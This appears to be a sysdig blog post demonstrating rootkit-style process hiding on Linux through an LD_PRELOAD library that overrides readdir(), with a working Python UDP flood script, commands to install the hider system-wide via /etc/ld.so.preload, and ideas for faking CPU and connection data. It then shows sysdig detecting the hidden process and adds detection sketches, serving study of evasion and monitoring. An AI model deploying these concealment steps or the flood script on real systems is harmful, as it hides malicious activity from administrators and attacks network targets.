Hiding Linux Processes For Fun And Profit
The other day I was looking at the output of top on my machine, and I wondered: how hard would it be to hide specific processes and/or network connections from traditional monitoring tools like lsof, …? I decided to kill a couple hours and try to hack together a solution. In this post, I’ll show you some of the answers I came up with, and some proof of concept code to implement this. I’ll also show that sysdig is not susceptible to my hack, and explain why.
The goal that I want to achieve is to deliberately hide a simple and malicious Python script (I’ll call it evil_script.py) that does some damage to my system, saturating CPU and network by sending UDP packets towards a poor victim:
#!/usr/bin/python
# Python 2 script: floods a target with UDP datagrams in a tight loop.
import socket
import sys

def send_traffic(ip, port):
    print "Sending burst to " + ip + ":" + str(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.connect((ip, port))
    # Never returns: keeps one core busy and the network saturated.
    while True:
        sock.send("I AM A BAD BOY")

if len(sys.argv) != 3:
    print "Usage: " + sys.argv[0] + " IP PORT"
    sys.exit()

send_traffic(sys.argv[1], int(sys.argv[2]))
The Baseline Behavior
I’ll start by running this:
gianluca@sid:~$ ./evil_script.py 184.108.40.206 666
Sending burst to 220.127.116.11:666
If you run it, you’ll see it will quickly saturate your system resources. Perfect use case for starting the analysis. Let’s confirm that the process is there and eating my CPU, using ps:
gianluca@sid:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
...
gianluca  8585  105  0.0  34256  6152 pts/6    R+   12:03   0:07 /usr/bin/python ./evil_script.py 18.104.22.168 666
...
Yep. I can also look at the network connections opened by the process by using lsof:
gianluca@sid:~$ sudo lsof -i
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
...
evil_scri 8290 gianluca    3u  IPv4  23936      0t0  UDP 172.16.189.136:33220->22.214.171.124:666
...
So the process is there, doing network activity. If I want to hide this information, the first thing I have to do is understand how ps and similar tools can actually extract the information about my process.
How ps works
ps leverages the /proc file system, a Linux construct that we explained at a high level in a previous post. Let’s dig into the details now using sysdig:
gianluca@sid:~$ sudo sysdig proc.name = ps
...
447463 23:54:12.077878685 2 ps (3214) > openat dirfd=AT_FDCWD name=/proc flags=1089(O_DIRECTORY|O_NONBLOCK|O_RDONLY) mode=0
447465 23:54:12.077880122 2 ps (3214) < openat fd=5(/proc)
447473 23:54:12.077887674 2 ps (3214) > getdents
447486 23:54:12.077988237 2 ps (3214) < getdents
...
452546 23:54:12.082257864 2 ps (3214) > open
452547 23:54:12.082259424 2 ps (3214) < open fd=6(/proc/3174/stat) name=/proc/3174/stat flags=1(O_RDONLY) mode=0
452548 23:54:12.082259730 2 ps (3214) > read fd=6(/proc/3174/stat) size=1024
452549 23:54:12.082262601 2 ps (3214) < read res=322 data=3174 (evil_script.py) R 3089 3174 3089 34816 3174 4202496 1620 0 15 0 8 3474 0 0
452550 23:54:12.082262874 2 ps (3214) > close fd=6(/proc/3174/stat)
452551 23:54:12.082262982 2 ps (3214) < close res=0
452552 23:54:12.082266445 2 ps (3214) > open
452553 23:54:12.082267682 2 ps (3214) < open fd=6(/proc/3174/status) name=/proc/3174/status flags=1(O_RDONLY) mode=0
452554 23:54:12.082268000 2 ps (3214) > read fd=6(/proc/3174/status) size=1024
452555 23:54:12.082274407 2 ps (3214) < read res=854 data=Name:.evil_script.py.State:.R (running).Tgid:.3174.Ngid:.0.Pid:.3174.PPid:.3089.
452556 23:54:12.082274624 2 ps (3214) > close fd=6(/proc/3174/status)
452557 23:54:12.082274724 2 ps (3214) < close res=0
452558 23:54:12.082276935 2 ps (3214) > open
452559 23:54:12.082278171 2 ps (3214) < open fd=6(/proc/3174/cmdline) name=/proc/3174/cmdline flags=1(O_RDONLY) mode=0
452560 23:54:12.082278466 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131072
452561 23:54:12.082280215 2 ps (3214) < read res=46 data=/usr/bin/python../evil_script.py.126.96.36.199.6666.
452562 23:54:12.082280463 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131026
452563 23:54:12.082280814 2 ps (3214) < read res=0 data=
452564 23:54:12.082281083 2 ps (3214) > close fd=6(/proc/3174/cmdline)
452565 23:54:12.082281216 2 ps (3214) < close res=0
This perfectly highlights how ps works: first, the directory /proc is opened via the openat() system call. Then, the process calls getdents() on the opened directory, which is a system call that returns the list of files/directories contained in a specific directory (/proc in this case). If you’ve ever run ls /proc, you’ll have noticed that there is a subdirectory for every running process in the system, and each directory is named after the PID of the process itself. So, ps will just grab the list from getdents(), and then iterate over a fixed set of files in each subdirectory. These files, as you can see from the event list, are named /proc/PID/stat, /proc/PID/status and /proc/PID/cmdline, and contain all the information that ps shows in the output.
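To make the flow above concrete, here is a minimal Python 3 sketch of the same enumeration: list the numeric entries under /proc, then read stat and cmdline for each one. It is only an illustration, not how ps is actually implemented; the helper names (parse_stat, decode_cmdline, list_processes) and the proc_root parameter are made up for this example.

```python
import os


def parse_stat(line):
    """Extract a few fields from the contents of /proc/PID/stat."""
    # The command name sits between parentheses and may itself contain
    # spaces or parentheses, so split on the first "(" and the last ")".
    left = line.index("(")
    right = line.rindex(")")
    rest = line[right + 1:].split()
    return {
        "pid": int(line[:left]),
        "comm": line[left + 1:right],
        "state": rest[0],
        "ppid": int(rest[1]),
    }


def decode_cmdline(raw):
    """Split the NUL-separated bytes of /proc/PID/cmdline into arguments."""
    if not raw:
        return []  # kernel threads expose an empty cmdline
    return [arg.decode(errors="replace") for arg in raw.rstrip(b"\0").split(b"\0")]


def list_processes(proc_root="/proc"):
    """Return one dict per numeric subdirectory of proc_root."""
    processes = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue  # skip entries that are not PIDs
        base = os.path.join(proc_root, name)
        try:
            with open(os.path.join(base, "stat"), errors="replace") as f:
                info = parse_stat(f.read())
            with open(os.path.join(base, "cmdline"), "rb") as f:
                info["cmdline"] = decode_cmdline(f.read())
        except (OSError, ValueError):
            continue  # the process exited (or changed) while we were reading
        processes.append(info)
    return processes
```

On a Linux machine, calling list_processes() with no arguments walks the real /proc. Note that the whole thing depends on the directory listing: a PID that never shows up in os.listdir() is never opened.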
It’s worth noticing (as it will be useful in the next section) that the process itself doesn’t directly call openat() and getdents(), as those are system calls that are abstracted by the C standard library (libc). libc provides two different functions, opendir() and readdir(), and they take care of calling the system calls themselves, providing a somewhat simpler API to the developer. So these last ones are the functions that are directly called from ps.
Hiding the process
After this quick digression on how ps works, it seems fairly obvious that if we want to hide our process, we need a way to prevent these tools from accessing the proper files under /proc/PID/. What are the options? There are various methods worth mentioning:
- Using a proper framework: there are a bunch of very good frameworks, like SELinux and Grsecurity that do, among other things, exactly this. In a production system, I would absolutely consider these, although today I want to get my hands dirty and have fun creating something from scratch.
- Modify top/ps/… binaries: I could grab the source code of each of these tools, implement my own “hiding linux processes” logic, recompile, and replace the binaries. Very inefficient and time consuming.
- Modify libc: I could modify libc and add code that excludes access to some /proc files. But recompiling libc is a burden, not to mention that the libc code tends to be very hard to understand.
- Modify the system calls in the kernel: This is the most advanced, and it would work by intercepting and modifying the getdents() system call directly in the kernel with a custom module. It’s definitely tempting, but I won’t follow this route today because I’m already very familiar with how the system call interception works in sysdig, so I want to do something new.
I decided to go for an intermediate solution, one that is interesting and simple enough to implement in an hour or so: it’s a variant of “modifying libc” based on a tricky feature offered by the Linux dynamic linker (the component that takes care of loading the various libraries needed by a program at runtime), called preloading.
With preloading, Linux is kind enough to give us the option to load a custom shared library before the other normal system libraries are loaded. This means that, if the custom library exports a function with the same signature as one found in a system library, we are literally able to override it with the custom code in our library, and all the processes will automatically pick up our custom one!
This sounds like a solution to my problem, because I could write a very simple custom library that overrides readdir(), and write the logic to hide the process! The logic would be fairly straightforward too: every time I see that the /proc/PID directory (where PID is the PID of the process having the name “evil_script”) is being read, I just block that access in a clean way, thus hiding the entire directory! I went ahead and implemented these thoughts in code. You can get the sources at https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c (it’s actually less than 100 lines of code including comments, so go read it!). Once the code is written, let’s compile it as a shared library, and install it in the system path:
gianluca@sid:~/libprocesshider$ make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/
Now, I just need to tell the dynamic linker to actually use it. I want to install it system-wide, so that every new process in the system can pick this up automatically. This is done by simply writing my library path into a configuration file:
root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Done! From this moment on, every new binary that I’ll launch will execute my custom code when iterating through directories via readdir(). So let’s go back and try this by executing ps and lsof while the evil script is running:
gianluca@sid:~$ sudo ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca@sid:~$ sudo lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
It works! My process is now running in invisible mode, even when the tools are run as root. I also repeated this with htop, and none of them were able to show my process anymore.
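The filtering decision behind this result is small. The following Python 3 snippet is only a model of it, not the C code from the repository linked above: a real override has to live in a shared library that exports readdir(). The function name visible_entries, the process_name_of callback, and the hidden name "evil_script.py" (taken from the ps trace earlier) are assumptions made for the illustration.

```python
def visible_entries(dir_path, entries, process_name_of, hidden_name="evil_script.py"):
    """Yield the directory entries a filtering readdir() wrapper would let through.

    dir_path        -- directory being listed
    entries         -- names the real readdir() would return
    process_name_of -- callable mapping a PID string to a process name (or None)
    """
    for name in entries:
        is_pid_dir = dir_path == "/proc" and name.isdigit()
        if is_pid_dir and process_name_of(name) == hidden_name:
            continue  # pretend this entry does not exist and move on
        yield name


# Example: three entries under /proc, one of which belongs to the hidden process.
names = {"1": "init", "3174": "evil_script.py"}
print(list(visible_entries("/proc", ["1", "3174", "cpuinfo"], names.get)))
# prints ['1', 'cpuinfo']
```

Entries outside /proc are never touched in this model, which is why ordinary directory listings would keep working.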
This is just a simple example, but we could also spoof more information, for example:
- Modify the global CPU usage counters: /proc/stat contains those statistics, so I could intercept all the read operations to that file and return a custom one, faking a 0% global CPU usage.
- Modify the connection list: for example, netstat uses the /proc/net/tcp file to get the list of TCP connections. Just intercept the reads to the file and hide a specific connection.
Good exercises for the reader :)
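As a starting point for the connection-list exercise, here is a hedged Python 3 sketch of the parsing and filtering step only (it does not intercept anything). It assumes the usual /proc/net/tcp layout, where the second and third columns are hex-encoded local and remote ADDRESS:PORT pairs, and a little-endian host such as x86. decode_endpoint and drop_connection are hypothetical helper names, and IPv6 tables are not handled.

```python
import socket


def decode_endpoint(field):
    """Turn a hex "ADDRESS:PORT" column from /proc/net/tcp into (ip, port)."""
    addr_hex, port_hex = field.split(":")
    # On little-endian machines the four address bytes appear reversed.
    ip = socket.inet_ntoa(bytes.fromhex(addr_hex)[::-1])
    return ip, int(port_hex, 16)


def drop_connection(table_text, remote_ip, remote_port):
    """Return table_text without the rows whose remote endpoint matches."""
    kept = []
    for line in table_text.splitlines():
        columns = line.split()
        # Data rows start with an index such as "0:"; the header is kept as is.
        if len(columns) > 2 and columns[0].endswith(":"):
            if decode_endpoint(columns[2]) == (remote_ip, remote_port):
                continue  # this is the connection we want to hide
        kept.append(line)
    return "\n".join(kept) + ("\n" if kept else "")
```

A preloaded library would have to apply the same kind of filter to the bytes returned when a tool reads the file, which is a good deal more work than the readdir() case.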
Note that this method won’t work if the binaries are statically linked against libc. I’ve seen some niche distributions extremely focused on security, where all the binaries’ dependencies are statically linked. This has the huge disadvantage that the binaries tend to get pretty big, and shipping an update for a library forces shipping new binaries of every program that depends on it, so it’s usually not done in mainstream distributions.
Let’s see if sysdig can be tricked as well, starting with CPU usage:
gianluca@sid:~$ sudo sysdig -c topprocs_cpu
CPU%      Process
------------------------------
99.99%    evil_script.py
2.46%     sysdig
0.27%     java
0.03%     sshd
And network activity:
gianluca@sid:~$ sudo sysdig -c topprocs_net
Bytes     Process
------------------------------
862.53KB  evil_script.py
400B      sshd
gianluca@sid:~$ sudo sysdig -c topconns
Bytes     Proto     Connection
------------------------------
841.79KB  udp       172.16.189.136:54241->188.8.131.52:8888
496B      tcp       172.16.189.1:57832->172.16.189.136:22
With sysdig, we’re still able to see it all! This is because sysdig doesn’t necessarily rely on /proc to look for system activity (although it uses it if available). Sysdig inspects every system call, and in this data the malicious process is still clearly visible, along with all its used resources. Hiding system calls is a much more challenging task that can’t be done in a couple hours. In fact, sysdig can see everything:
gianluca@sid:~$ sudo sysdig proc.name contains evil_script
261683 19:27:57.433924531 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->184.108.40.206:8888) size=14 tuple=NULL
261684 19:27:57.433930125 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261685 19:27:57.433931321 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->220.127.116.11:8888) size=14 tuple=NULL
261686 19:27:57.433970361 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261687 19:27:57.433975269 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->18.104.22.168:8888) size=14 tuple=NULL
261688 19:27:57.433980600 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261689 19:27:57.433981682 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->22.214.171.124:8888) size=14 tuple=NULL
261690 19:27:57.434022148 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY
261691 19:27:57.434026297 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->126.96.36.199:8888) size=14 tuple=NULL
...
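The per-process totals printed by topprocs_net can be approximated offline from a raw event dump. The Python 3 sketch below is not how sysdig is implemented; it simply parses text lines in the format shown in the output above and sums the res= values of exit events per process. The regular expression and the names parse_event and bytes_by_process are assumptions for this example.

```python
import re
from collections import Counter

# Fields: number, time, cpu, process name, (tid), direction, event type, arguments
EVENT_RE = re.compile(
    r"^(?P<num>\d+) (?P<time>\S+) (?P<cpu>\d+) (?P<proc>.+?) "
    r"\((?P<tid>\d+)\) (?P<dir>[<>]) (?P<type>\S+) ?(?P<args>.*)$"
)
RES_RE = re.compile(r"\bres=(\d+)")


def parse_event(line):
    """Return the fields of one event line as a dict, or None if it doesn't match."""
    match = EVENT_RE.match(line.strip())
    return match.groupdict() if match else None


def bytes_by_process(lines, event_type="sendto"):
    """Sum the res= value of exit ("<") events of event_type per process name."""
    totals = Counter()
    for line in lines:
        event = parse_event(line)
        if not event or event["dir"] != "<" or event["type"] != event_type:
            continue
        result = RES_RE.search(event["args"])
        if result:  # negative (error) results do not match and are skipped
            totals[event["proc"]] += int(result.group(1))
    return dict(totals)
```

Only exit events are counted because, in the dump above, the number of bytes actually sent appears in res= on the "<" line rather than on the ">" line.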
As a bonus, sysdig is also showing me that the dynamic linker is loading my custom library before libc. This is what happens when ps executes after the preload change:
gianluca@sid:~$ sudo sysdig proc.name = ps
2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0
...
2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0
2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832
...
2810 00:21:52.721293540 1 ps (3351) > open
2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0
2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832
...
/usr/local/lib/libprocesshider.so is automatically loaded before /lib/x86_64-linux-gnu/libc.so.6, without having to change the ps code or the libc code.
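The presence of the preloaded library can also be cross-checked without sysdig. As a rough Python 3 sketch (Linux only, with hypothetical helper names), the snippet below splits the system-wide preload list and extracts the shared objects mentioned in the text of /proc/PID/maps. It assumes /etc/ld.so.preload holds a whitespace-separated list of library paths, as described in the ld.so manual page.

```python
def preload_entries(text):
    """Split the contents of /etc/ld.so.preload into library paths."""
    return text.split()


def mapped_libraries(maps_text):
    """Return the distinct .so paths in /proc/PID/maps content, in order of appearance."""
    seen = []
    for line in maps_text.splitlines():
        fields = line.split(None, 5)  # the pathname, if any, is the 6th field
        if len(fields) < 6:
            continue  # anonymous mapping, no backing file
        path = fields[5].strip()
        if ".so" in path and path not in seen:
            seen.append(path)
    return seen


def read_text(path):
    """Read a small text file, returning "" if it is missing or unreadable."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""
```

For example, preload_entries(read_text("/etc/ld.so.preload")) lists what the dynamic linker was told to preload, and mapped_libraries(read_text("/proc/self/maps")) shows what ended up mapped into the current process. The maps file is sorted by address, so it confirms that the library is loaded but says nothing about load order.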
In theory, I could have used strace/ltrace to attach to the process and see what it was doing in a similar way, but if you remember I completely hid the malicious process PID from /proc, so how would we find it? Those tools require the exact PID to attach in order to work. I could have brute-forced the entire PID range, but that doesn’t seem like a very attractive alternative. Also, those tools just provide a flat list of events, whereas sysdig, with chisels, can aggregate the events and show me exactly what I care about (in this case CPU/network consumption).
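For completeness, the brute-force idea could look roughly like the Python 3 sketch below. It rests on an assumption that follows from the approach described in this post rather than from anything tested here: a readdir() override only affects directory listings, so /proc/PID/status can still be opened directly when the PID is known. The helper names and the proc_root and max_pid parameters are hypothetical, and the result can contain false positives for processes that start between the listing and the probe.

```python
import os


def listed_pids(proc_root="/proc"):
    """PIDs visible through a plain directory listing."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def is_process(pid, proc_root="/proc"):
    """True if PID exists and is a thread-group leader (a process, not a thread)."""
    status_path = os.path.join(proc_root, str(pid), "status")
    try:
        with open(status_path, errors="replace") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except (OSError, ValueError, IndexError):
        pass  # no such PID, or it vanished while we were reading
    return False


def hidden_pids(listed, max_pid, proc_root="/proc"):
    """Probe every PID up to max_pid and return those missing from the listing."""
    return [pid for pid in range(1, max_pid + 1)
            if pid not in listed and is_process(pid, proc_root)]
```

The Tgid check matters because thread IDs can be opened under /proc even though they never appear in its listing; without it, every extra thread would look like a hidden process. On a real system, max_pid would come from /proc/sys/kernel/pid_max, and the call would be hidden_pids(listed_pids(), max_pid).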
As one last consideration, it’s worth clarifying that although it might be possible to get your machine compromised in this exact way (I know there are rootkits out there that rely on this easy and effective method), that is certainly not the point of this post. I just enjoyed it as a thought experiment, and hopefully this demonstrates a simple and powerful method that can be used by application developers to solve real problems in certain circumstances. I think this also proves that monitoring the system usage can be done from different perspectives, and getting data from system calls can be as good as extracting it from the /proc file system. And at the end of the day, I think we’re all very lucky to have Linux and the /proc file system with its useful metrics exported in plain-text files, ready to be read and inspected without any custom tools!
As always, we'd love to hear from you. If you have any thoughts or questions, please let us know in the comments or on @sysdig. Thanks!